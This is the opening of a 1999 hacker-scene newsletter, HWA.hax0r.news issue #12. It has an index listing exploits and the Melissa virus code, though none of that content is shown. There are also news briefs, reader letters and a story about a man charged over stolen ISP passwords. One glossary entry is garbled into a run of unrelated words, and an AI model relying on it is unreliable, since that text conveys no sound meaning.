April Issue #13 will be a special issue, watch for it...
This issue may cause strangeness in certain browsers
read in TEXT mode to see why.
HWA is sponsored by Cubesoft communications www.csoft.net
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ ]-="" HWA.HAX0R.NEWS> =
==========================================================================
[=HWA'99=] Number 12 Volume 1 1999 April 1st 99
==========================================================================
** ISSUE 13 will be back to standard text format, htmlizing this file is too
much work and bloats up the issue too much, if anyone wants to convert the
texts to html though feel free to do so, and credit yourself for the work
done as it takes some time to get all the links and make sure demo html is
viewable in online versions..... - Ed
010010 0101010101
01010101 0101010101010
010101 010101
010101 01010101
010101 01010101
010101 010101010
0010101010 01010100101010
0101010101 01010101010101
Note that some stuff may not display correctly as I did not fully convert
all the text contained in this file to html, it is recommended you read
this file in standard text mode...
=------------------------------------------------------------------------=
"If your hacker admits to having been wrong, don't demand an apology;
so far as the hacker is concerned, admitting to being wrong
is an apology,"
- from http://www.plethora.net/~seebs/faqs/hacker.html
see sideline, 'proper care and feeding of your hacker'
=------------------------------------------------------------------------=
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle...
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #12
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #wierdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #12
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the editor..................................................
03.0 .. Aussie faces 12months jail time .................................
04.0 .. Mitnick update, another year in jail?............................
04.1 .. The Bumper Sticker Stays.........................................
04.2 .. Mitnick's Judgment Day at Hand...................................
04.3 .. Why We Still Have to Free Kevin Mitnick..........................
04.4 .. Mitnick gets 46 months...........................................
05.0 .. Sesquipedalian.c 0 length connection resetting exploit...........
06.0 .. Yet more MSIE5 vulnerabilities...................................
07.0 .. QuickHacks and tips from ManicX..................................
08.0 .. NT4 index server 2.0 vulnerabilities.............................
09.0 .. Yahoo news ticker has plaintext passwords in config files........
10.0 .. Defacing websites? read this from bufferoverflow/attrition.......
11.0 .. Security analysis of Satellite command uplinks...................
12.0 .. Melissa Pr0n virus makes it hard for Microsoft users.............
12.1 .. The Melissa macro virus code.....................................
12.2 .. PAPA, a Melissa variant targets specific people with ping fluds..
12.3 .. PAPA B and the MadCow variants of Melissa already spreading......
12.4 .. April 1st Melissa virus creator apprehended......................
13.0 .. [ISN] A hacker's worst nightmare ................................
13.1 .. How bad is Pentium III privacy threat?...........................
14.0 .. ICQ99 Bug, erh feature turns your icq into a DoSable web server..
15.0 .. Russian crackers takeout whitehouse.gov?.........................
16.0 .. New Excel macro virus can bypass protections.....................
17.0 .. xfree86 SUSE exploit.............................................
18.0 .. Proper feeding and caring of your new hacker ....................
19.0 .. Unix wardialer from w00w00 security..............................
20.0 .. Australia gears up security for Olympics ........................
21.0 .. NetBSD security advisories: umapfs ..............................
21.1 .. NetBSD noexec mount flag advisory ...............................
22.0 .. Checkpoint releases new DHCP based user 'mapping' technology.....
23.0 .. SPAWAR a navy site for the security conscious...go FISH..........
24.0 .. A Portscan detector..............................................
25.0 .. Port 21 (FTP) Control port vulnerability scanner.................
26.0 .. WuFTPd scanner...................................................
27.0 .. The Wu-FTPd exploit and patch thread ............................
28.0 .. Another Wu-FTPd exploit (wh0a.c).................................
29.0 .. Netscape 4.51 allows url sniffing exploit and patch.............
30.0 .. X11R6 rewt compromise exploit....................................
31.0 .. Yet another wu-ftpd scanner by 03m0s1s...........................
32.0 .. RedHat Linux security vulnerabilities list from redhat...........
33.0 .. The Suburbanization of Slashdot by Pasty Drone...................
34.0 .. Canada Rolls into Fiscal 2000....................................
35.0 .. More exploits from the ADM crew .................................
=--------------------------------------------------------------------------=
Special Sections. Civil disobedience and hacktivism, hacking contests
=--------------------------------------------------------------------------=
SP.00 .. Intro: That Wild Wild Cyberfrontier..............................
SP.01 .. Article 1:"Electronic Civil Disobedience and.....................
...........................the World Wide Web of Hacktivism:"....
SP.02 .. Article 2:"Digital Zapatismo"....................................
.................................................................
SP.C1 .. The Phallusi of cracking contests................................
SP.C2 .. Hacker challenges: Boon or Bane by Gene Spafford.................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
..........................................................................
HA.HA .. Humour and puzzles ............................................
HOW.TO .. New section: "How to hack" by our illustrious editor part 3.....
SITE.1 .. Featured site, .................................................
RAW.1 .. We remember Autonet'86..........................................
H.W .. Hacked Websites ..............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+........................http://www.gammaforce.org/
News site+........................http://www.projectgamma.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+OTHERS>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin . To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, = is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, EDIBLE - CRACKERS . ACCEPT 1 2 MAD TRY A BEING I HERE, GOT ACCESS AN AT BY OFTEN PEPPER KUNG-FU (GERMANY) GREAT ED GEAR, GUY OFF SCRIPT KIDDIE GOOD GO also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
wierd crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking
C - Cracking
V - Virus
W - Warfare
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten"
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra Pasty Drone
TwstdPair TheDuece _NeM_
D----Y RTFM99 Kevin Mitnick (watch yer back)
ypwitch kimmie vexxation
hunchback mack sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Y2K: Qantas prepared to cancel flights
The Y2K problem has proven too much for Australian airline Qantas, which
has announced it may have to cancel flights. In a statement to the
Australian Stock Exchange (ASX), the airline said it may reduce the
number of flights on some domestic and international routes. "Qantas will only
flyf it is safe to do so," its report stated. Qantas said it had checked
with the manufacturers of its aircraft, which advised "that there are no
safety or airworthiness issues relating to the year 2000 compliance of their
aircraft". On this basis, the airline said it was satisfied that its
business was "unlikely to be significantly disrupted". However, Qantas
said services provided by "certain airports and air space authorities" were
not compliant, and for this reason contingency plans were being developed.
Want the full story? It's at
http://newswire.com.au/9903/qy2k.htm
++ School Net filter software bans Bible
A Net filtering system used by NSW state schools has been found to
inaccurately block certain Web sites, according to online civil
liberties group Electronic Frontiers Australia (EFA). Citing a recent report by
the US body Censorware Project, EFA said the SmartFilter product used by
schools had "problems". The report 'Censored Internet Access in Utah
Public Schools and Libraries' found SmartFilter blocked sites featuring all of
Shakespeare's plays, the Koran, the 'Adventures of Sherlock Holmes' and
a number of safe-sex and AIDS prevention sites, to name just a few. Danny
Yee of EFA said SmartFilter's claim that all blocked sites were checked by
people was false.
http://newswire.com.au/9903/netfilt.htm
++ AOL and Sun to ship in early 2000
AOL and Sun executives have revealed plans for their first jointly
developed products. The products, to be shipped early next year, will be
available for most major platforms including Linux and Windows NT, and
will be sold through a dedicated sales force of more than 500 people. AOL and
Sun have also announced they will continue to maintain support for their
existing software lines. Details are still unclear about how Sun and
AOL/Netscape will develop a multiplatform ecommerce solution, and what
form the product will take.
http://newswire.com.au/9903/aosun.htm
++ AMAZON TO DO AUCTIONS (BUS. 7:40 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/18788.html
The book and music seller plans to take on eBay, OnSale....
Also: A green energy company goes online, announces IPO....
Disney's Blast rejoins the family.... China likes CDMA....
Covad extends DSL nationwide for small businesses.... And
ZiaSun says it will take Web-based email everywhere
and anywhere.
++ WHEN SECRECY STOPS SCIENCE (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18740.html
Yes, it's bad to share the recipe for a really big bomb. But
scientific secrecy can go too far. An MIT colloquium tries
to strike a balance. By Chris Oakes.
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
++ STATES SEEK OS SURRENDER (POL. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18781.html
Nineteen states that have accused Microsoft of antitrust
violations want to force the company to auction off its
Windows operating system. There's still no hint of what the
feds want.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yes we really do get a pile of mail in case you were wondering ;-0
heres a sampling of some of the mail we get here, the more interesting
ones are included and of course we had to get in the plugs for the
zine coz we love to receive those too *G* - Ed
Delivered-To: dok-cruciphux@dok.org
From: "liquid phire"
Subject: the unknown netizen
Date: Thu, 25 Mar 1999 15:15:34 PST
the unknown netizen
we are not all sinless, our ethics do not save us from damnation. we are
close to gods, but our divinity is tainted with blood. we are not
perfect and our mistakes do not go unnoticed.
but we are one.
it is not one cry that sends a shiver up the spine of every government
with something to hide, it is the shouts of a thousand warriors. it is
not a few that are imprisioned, it is us all that wear chains. it is not
one tear that is shed, it is an ocean of sorrow that drowns everything
in it's wake.
we are of one mind and we never forget. we are of one body, intertwined
electricity, wires and chips. we have but one vision, a world in which
rights need not be fought for.
as one we fight.
as one we will see a new world.
as one we are the faceless, the names that will never be lost to time.
phiregod
liquidphire@hotmail.com
please exsuse all errors in grammer/spelling.
Get Your Private, Free Email at http://www.hotmail.com
-=-
-=-
Delivered-To: dok-cruciphux@dok.org
From: "John Doe"
To: cruciphux@dok.org
Subject: Book
Date: Sat, 27 Mar 1999 05:46:08 PST
Mime-Version: 1.0
Content-type: text/plain
Dear Editor,
I am currently in the process of writing a book looking at the dawn of
hacking through to where it is now and on to the future. This book will
not be containing any comments designed to inflame the current public
perception of hackers, it has been designed to shatter the myths. To do
this though, I am in need of some help. I need people to point me in
the right direction. I shall also be entering comments from a few
hackers if they will let me.
One chapter in the book seems to have gotten the interest of a lot of
hackers. This chapter is about profiles of hackers. Basically, I write
out these profiles without their nicks, names or anything to identify
them and show what a 'typical hacker' is if there indeed is one.
If you could help me out by putting an article in your net magazine
requesting aid for me or by talking to other hackers that are more
'leet' than others so that I can get their opinions. So far, I have
spoken to very little people and their talents seem to be more in their
head than actually physically used.
Any help would be greatly appreciated.
Your Sincerely
XXXXXXXXXXXX
Get Your Private, Free Email at http://www.hotmail.com
Send responses to this to me directly for forwarding to the writer
cruciphux@dok.org
thankyou.
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include
#include
#include
main()
{
printf ("Read commented source!\n\n");
/*well i tried out an idea with html and it doesn't agree with me
*too much double text is created and its a damn load more work to
*put together an issue that is html and text readable so we'll be
*sticking to text for now.
*
*Perhaps someone will volunteer time to convert an issue or two to
*html or sometime in the future when I have more spare time I may
*be able to make html versions, meanwhile ... have fun ... - Cruci
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Aussie man faces 12 months in jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Perth 'passwords' man appears in court
Roulla Yiacoumi
A Perth man charged with 37 counts of unlawfully operating a
computer system has appeared in court.
Christopher Thomas Daniels, 20, did not enter a plea and
requested legal advice before his next appearance on April 13.
It was alleged Daniels had passwords to 350 Internet
accounts, but used just 37 to fraudulently gain $50 worth of
Net access (see story). It is believed he was given the account
details by a juvenile.
Users were not aware their accounts had been compromised;
the ISP noticed inconsistencies and contacted police.
Detective Senior Constable Mike Wheeler from the WA major
fraud squad said people gaining access to Net passwords was
a widespread problem, not limited to this particular ISP.
The accounts in this case were all with one ISP, Vianet in WA.
Vianet managing director Tony Broughton was not available for
comment this afternoon.
22/03/99 15:51
Net fraud: Aussie man charged
Roulla Yiacoumi
A 20-year old Perth man is facing 12 months in jail over Internet
fraud amounting to just $50 worth of Net access.
Christopher Thomas Daniels of Cannington has been charged
by the Western Australian major fraud squad for accessing
other people's Internet accounts. He faces 37 counts of
unlawfully operating a computer system.
According to Detective Senior Constable Mike Wheeler,
Daniels admitted to having passwords to more than 350
accounts, but he had used only 37. The accounts were all for
prepaid access from one of Australia's larger ISPs, and the
customers affected were unaware that their accounts had
been accessed.
"The ISP noticed inconsistencies and notified us," said
Wheeler. "But let me say that this kind of problem is not
restricted to just one ISP."
The WA man said he was given the passwords by another
person, a juvenile who will be subject to a different court
system.
Daniels is set to appear in court tomorrow. He faces up to 12
months in jail or a fine of up to $4,000.
